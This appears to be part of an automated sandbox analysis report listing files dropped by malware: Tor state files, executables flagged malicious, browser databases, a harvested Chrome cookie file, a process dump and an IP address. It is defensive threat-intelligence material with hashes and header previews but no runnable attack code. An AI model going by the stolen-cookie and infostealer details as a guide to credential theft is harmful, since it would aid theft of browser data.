SHA1:	25C6222B8DC2A9E4C417E6B4E0A0B2429C2E5F0F
SHA-256:	03310FE784E506FB19B3398715684F0BC95D77C0B2F265761389E3AEEE49388A
SHA-512:	BF89C9CFD0378BA55B37B4EB7EFC4CD9E6F80ECBE7FEE22EBF57310BFDF305F06849530136544A22B10294CFF60C856068A7AF442C32E43D80930D831E693C9B
Malicious:	false
Preview:	@last-listed 2023-12-24 09:44:40.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALViJIiI6ndKfaRNwe9iBScAYloulpdZEG04jbmmyCCUtmyf/K7iaA80.dCoNgkzOpdH62c6rYoz+AjlCEwO/DHN1fC6Xv2BVYUZInHEi2XcrLV2b4XzRYvxn.yQ6q9xn8AQV01M1qSK1hp8sYCIQLk59sMGcgtlx2g88YOoxnL123AgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key cZ1W8fhoTuNcOUXboyd/Xu/6jY4lC+kU7Gbj1eiRpn4.id ed25519 TDTzAZTXIcV+uEl7P6gEgmu1RvUSYzuMxwxV+eWyFno.@last-listed 2023-12-24 09:44:40.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMxwMayyAhl/1mYZ2bS4uY2t9Zqk30+0drLU9BT+c3NlyhfBG1cH7ger.z4/HREWtdVl2xAiwj64Zg/LF3Tqky/BpkWh3Sx93FKJppUSmB790922Qf/sCc+lY.ppnBDZ5QFeq3nypYqEesrq8HWnwFCgOaZY32zFLK8m9xFIemnn8XAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key 01SIuITQ717lvnJTJJoRESLXzYaq7sQKacVT9m//IgI.family $004F9A0513C84E72054CEB555DB51EEEF319546D $0055DB090820D7C08999EC1598FD6EA6365861AD $008F10F88397C11C062217EAC35D782F03BDF4C7 $009EF5F8572D671AFCBBAD65998BA35B50EE04BC $00BD33C25A006BA95103D3E8043FA7EF1E2BCA6C $00FB85B65AC2F460CD46A

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\state.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (350), with CRLF line terminators
Category:	dropped
Size (bytes):	3892
Entropy (8bit):	5.313259409881364
Encrypted:	false
SSDEEP:	96:oPvKdnakl99SMyIW3e0kAOIJhx09hwXOkun:NB07bXG
MD5:	F5B5EF17C718A86A22F18657A6DCA299
SHA1:	DEF62C2764755340E11FACC6B8E5445787B893E6
SHA-256:	C98E8D7F3810A1F93E4609E39F1447835763FC31C2CD452852A2146DF3941C9B
SHA-512:	6A305A217869C9A1AAAE5E19C4BDE752BD3D53518F34A63AD66D953C82A1BE4BAE5A2B07CD7CFBC8234AFC9F2E78237F59434348142D6A8D7FD8070591A2BF2E
Malicious:	false
Preview:	# Tor state file last generated on 2023-12-24 10:51:50 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1125 1..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 1775 1..CircuitBuildTimeBin 1825 1..CircuitBuildTimeBin 2575 1..CircuitBuildTimeBin 5325 1..CircuitBuildTimeBin 16525 2..CircuitBuildTimeBin 17025 2..CircuitBuildTimeBin 17275 1..Dormant 0..Guard in=default rsa_id=F5136AE56909D48EBDE8EE2B0F230CD93AD91FF4 nickname=torious sampled_on=2023-12-17T06:26:19 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=A2F456206713EC7ED212D9E85C5DEB649980862E nickname=arpagic1 sampled_on=2023-12-17T17:20:16 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-21T13:40:32 confirmed_idx=0 pb_use_attempts=2.000000 pb_use_successes=2.000000 pb_circ_attempts=13.000000 pb_circ_successes=13.000000 pb_successful_circuits_closed=13.000000..Guard in=default rsa_id=07DA59

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\unverified-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2864083
Entropy (8bit):	5.611777754537046
Encrypted:	false
SSDEEP:	12288:88HOVxuKmnjWaKra126wGBuotcs5d+9vtBZKlaB1fI5OISL2WNeoyJ4LI:89Duxqal1QotcCs5oa7GylyJ4E
MD5:	6A5FEAA08D7082781F7B6DE5A1BFC4D4
SHA1:	53C6E057E64BC916132F669832200C26957E6F52
SHA-256:	FAAA01E55523AA8EBB300FCB30042D752CB290618CDE987561559679A2B8C66F
SHA-512:	04A6B1D91C8D3B274C32CD659D41569CB04509F985F6B9F3419A3B70996A17A9400F5181D34D3D55C3C26B804A0B716621F33D87B61B41BBDF654E9FD7E15A8C
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-24 09:00:00.fresh-until 2023-12-24 10:00:00.valid-until 2023-12-24 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\5AAB.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	291840
Entropy (8bit):	6.732812374188538
Encrypted:	false
SSDEEP:	6144:AxNgINbJfBeL7gJfk6rz8XVCb/zJvv06a7xkB3s2fnVtV:8rbJ8XkrzuVCTtvFQxqTfnPV
MD5:	F2FD38A6DDDB5B6C67C9F6622AFBD47B
SHA1:	C66E4B348C79D9619101B9E9EFC2184343C955B4
SHA-256:	AC770EEE5272A20548834B20197C449E2A11F44CB67B53AFCB69AE1041B8337E
SHA-512:	32528F3A0F84D2D210225BE88B6FF8C95337302C0173161E1E4B5101FB1BC1DB1C4B198ADCCE9F2D50C350F2DB6D3F1BA70174F8B208B939EB16A95D6381A79F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'p..'p..'p..u...'p..u.'p..u.3'p......'p..'q.<'p..u...'p..u.'p..u.'p.Rich.'p.........PE..L......c............................j.............@..........................................................................-..P....... $...........................................................................................................text...f........................... ..`.rdata...:.......:..................@..@.data....g...@...&...$..............@....yovot..A............J..............@....rsrc... $.......&...N..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\69C8.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\69C8.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6ED0.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6817190
Entropy (8bit):	7.999372420336587
Encrypted:	true
SSDEEP:	98304:j8MuNTRKmZXC8OZTkfLaSFbf+k+dKmhd0T7AnlOyTXg8v2xqaqGMwGs2E4dm8:3uq8OZTk+SJmCTUnlZE8y7kw52E4dD
MD5:	68514F27EE18239DBB1731E852DFF0C1
SHA1:	EA3E35DDD3954F5EBBB0E757AADFFFADA429C503
SHA-256:	F2ED07E15710201C63432517EE4A8B8A49DFD9DFAFDD8D9F294AE69AAA5E96B5
SHA-512:	69E34B0A4F6BFA78F6BA414CE356724B4EF94877168A53D39C3DA95E9FCA76339D8C2D9C1ED41AE6F82DD5D474E1B86E18BD351C9F021CA6EC30A805B3FC1953
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......e.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\71F7.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\74C8.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\76AD.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\776A.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7A2A.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7D28.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7E62.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\820.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2017792
Entropy (8bit):	7.882413889771764
Encrypted:	false
SSDEEP:	49152:itCW0MSJfxkfBNec7L3jdHWNefneKAIBvxlRF1E:itz0MiOfbD79HWNeeKDtn1
MD5:	EE1049D8F8248D11080582FE27F96843
SHA1:	6701BA82ECE6878C61FCE5204DEF8EFDC28822AB
SHA-256:	F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670
SHA-512:	F8DB9E2E7E0DEC1F95B83E52F67B15C0E93FCBA0801D220DB43C23D732A2BB298E986FD65493019F3FED9BBC840032FF5F5C9AE3DF6A025C596622B34757DEA6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 91%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......c.............................Y....... ....@..........................@.......u..........................................<....@...............................................................4..@............................................text............................... ..`.data........ ......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5515264
Entropy (8bit):	6.479505821994318
Encrypted:	false
SSDEEP:	98304:X4zVE2GO5za356R7mgdqMhW8hQjqb0It:gl7mg1WO
MD5:	00E93456AA5BCF9F60F84B0C0760A212
SHA1:	6096890893116E75BD46FEA0B8C3921CEB33F57D
SHA-256:	FF3025F9CF19323C5972D14F00F01296D6D7A71547ECA7E4016BFD0E1F27B504
SHA-512:	ABD2BE819C7D93BD6097155CF84EAF803E3133A7E0CA71F9D9CBC3C65E4E4A26415D2523A36ADAFDD19B0751E25EA1A99B8D060CAD61CDFD1F79ADF9CD4B4ECA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 30%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................?..........1?......@?...@..........................PV..................@...................0B.......A.@<...0G......................`B.t............................PB.....................p.A.D.... B......................text...\.>.......>................. ..`.itext...A....>..B....>............. ..`.data...d....@?.......?.............@....bss........ @..........................idata..@<....A..>....?.............@....didata...... B......:@.............@....edata.......0B......F@.............@..@.tls....T....@B..........................rdata..]....PB......H@.............@..@.reloc..t....`B......J@.............@..B.rsrc........0G.......E.............@..@.............PV......(T.............@..@................

C:\Users\user\AppData\Local\Temp\Google Chrome_Cookies_2023-12-24T10_44_51.689063+01_00_00.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	ASCII text, with CR line terminators
Category:	dropped
Size (bytes):	272
Entropy (8bit):	5.79470680241071
Encrypted:	false
SSDEEP:	6:PkIcSmxbuQc83xpSuG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAo:cIcbEQcIPK1NOpFwUuQLHaU9WvHN
MD5:	93D057BD7B31A434C561CCFE07AC18AF
SHA1:	444361EE9797C65549B8F71E12E7F3A69B4475F0
SHA-256:	39B381D3B14BBA2E61889E47308039FDD5222C6240CCC9F64E878C5B17FDC7AF
SHA-512:	38C797DD76784EA424ACF9F24B470140E9B19B87FA3DB9260DC61D6DBF66F882A8FB0E75B4A0BC222B17D2DB952F2934EC16E4F10EDECFC2410F73DE2E6FDED5
Malicious:	false
Preview:	.google.com.False./.True.1240427978.1P_JAR.2023-10-04-13..google.com.True./.True.1240427269.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4.

C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3ABE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2349777
Entropy (8bit):	7.989512105352851
Encrypted:	false
SSDEEP:	49152:Ioruw2s5FXQ4EmojLjCRELVf7Avil+dHIsLp1thIikN+6u2hs7:IoruwzX71oDCRAZUviAHImDqia7hs7
MD5:	B244F23C876D3F9A81F2C2B395408E70
SHA1:	B5CB85B38E0035113BC837CB330F48ECFAA8A922
SHA-256:	EE2F89AC8B23D35330A44B6B53B0AFED4B4A908EE16B844E4EDB0FAADF494A3A
SHA-512:	790357661F412EFC3F07928A832E36F141AFD06D8DCCE32082561EB8DFAE89A4C70A81E7756BB3687C5E42298389C0C882A6E489ED51F99CD1374E3795B6415D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................@............@..........................................P..`............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...`....P......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Proccesses.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	19055
Entropy (8bit):	5.634959565199216
Encrypted:	false
SSDEEP:	384:RVsrLsrNr5rKDr2ywr4VHKMp7Tp3FB0IzzIMc8kf23tTP1egxHLgWHVe1oxr05JI:4rorNr5rWrmrk
MD5:	99F975E2FEC43FE4E3CA59C58EF7F6AF
SHA1:	84CA7E9318529F173C334481098DAE51695544F2
SHA-256:	5F4E7B2470F72DFF35DECB3452634A75C29CC8CFC96E703EFF4364D604C51DC0
SHA-512:	78EC1C246F3C711D7F2B1471ED8A7E06A004144174B8AC79E5DE1EADC71360C3D25302F850F4371331D6B59FC1CE7C2F08DDD89FAE0D2B7A8ADE2F399FF84527
Malicious:	false
Preview:	ID: 0, Name: System Idle Process, CommandLine: NULL...ID: 4, Name: System, CommandLine: NULL...ID: 92, Name: Registry, CommandLine: NULL...ID: 332, Name: smss.exe, CommandLine: NULL...ID: 420, Name: csrss.exe, CommandLine: NULL...ID: 496, Name: wininit.exe, CommandLine: NULL...ID: 504, Name: csrss.exe, CommandLine: NULL...ID: 564, Name: winlogon.exe, CommandLine: NULL...ID: 632, Name: services.exe, CommandLine: NULL...ID: 640, Name: lsass.exe, CommandLine: NULL...ID: 752, Name: svchost.exe, CommandLine: NULL...ID: 780, Name: fontdrvhost.exe, CommandLine: NULL...ID: 788, Name: fontdrvhost.exe, CommandLine: NULL...ID: 872, Name: svchost.exe, CommandLine: NULL...ID: 924, Name: svchost.exe, CommandLine: NULL...ID: 992, Name: dwm.exe, CommandLine: NULL...ID: 444, Name: svchost.exe, CommandLine: NULL...ID: 732, Name: svchost.exe, CommandLine: NULL...ID: 280, Name: svchost.exe, CommandLine: NULL...ID: 1032, Name: svchost.exe, CommandLine: NULL...ID: 1056, Name: svchost.exe, CommandLine: NULL.

C:\Users\user\AppData\Local\Temp\is-6V76P.tmp\6ED0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\6ED0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704512
Entropy (8bit):	6.496956945559699
Encrypted:	false
SSDEEP:	12288:ERObekMSkfohrPUs37uzHnA6zg5cIsalHERjUrNN/RQ9wgUT5EDExyc:2ObekrkfohrP337uzHnA6cHswHE/6gU3
MD5:	A7662827ECAEB4FC68334F6B8791B917
SHA1:	F93151DD228D680AA2910280E51F0A84D0CAD105
SHA-256:	05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
SHA-512:	E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk58E1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	2.282588730501833
Encrypted:	false
SSDEEP:	3:MXgMgQXK:MwMgCK
MD5:	7EC97BF013D62C471828258E8BE69452
SHA1:	44DC0D29206C430C229B2DEADE360C8608E01122
SHA-256:	FACBED200D57C4C0015A496CA795D2A84BF295DC6BC9E1B2C5CBFD9F2A6F29AE
SHA-512:	1DD4EBEDE8EAEF235B0486C6C7AE010839558C005FE459E641537AAB7662D882ABC50AFF0B23096636A308938ED2C17BBDC600206E0B8FAB422D983F5C18A7E0
Malicious:	false
Preview:	102.129.152.212

C:\Users\user\AppData\Local\Temp\nsk58E2.tmp\INetC.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.391050633650523
Encrypted:	false
SSDEEP:	384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
MD5:	40D7ECA32B2F4D29DB98715DD45BFAC5
SHA1:	124DF3F617F562E46095776454E1C0C7BB791CC7
SHA-256:	85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
SHA-512:	5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.870552913343331
Encrypted:	false
SSDEEP:	6144:7D/4YmwLDg2dB7Aqw92Ab6qmaHetSf2fnVtV:H/42nn1Aqw9rbhxeIefnPV
MD5:	14ECE4108FC25FE4D185C101714A25B3
SHA1:	DB4C0E63EF57DC148DC84FB8E7558B45A069FD0E
SHA-256:	E1DDC3BF0959A65F141DA91C8D9A5F5550E9C72A19A9F958C21A490DC4A731B0
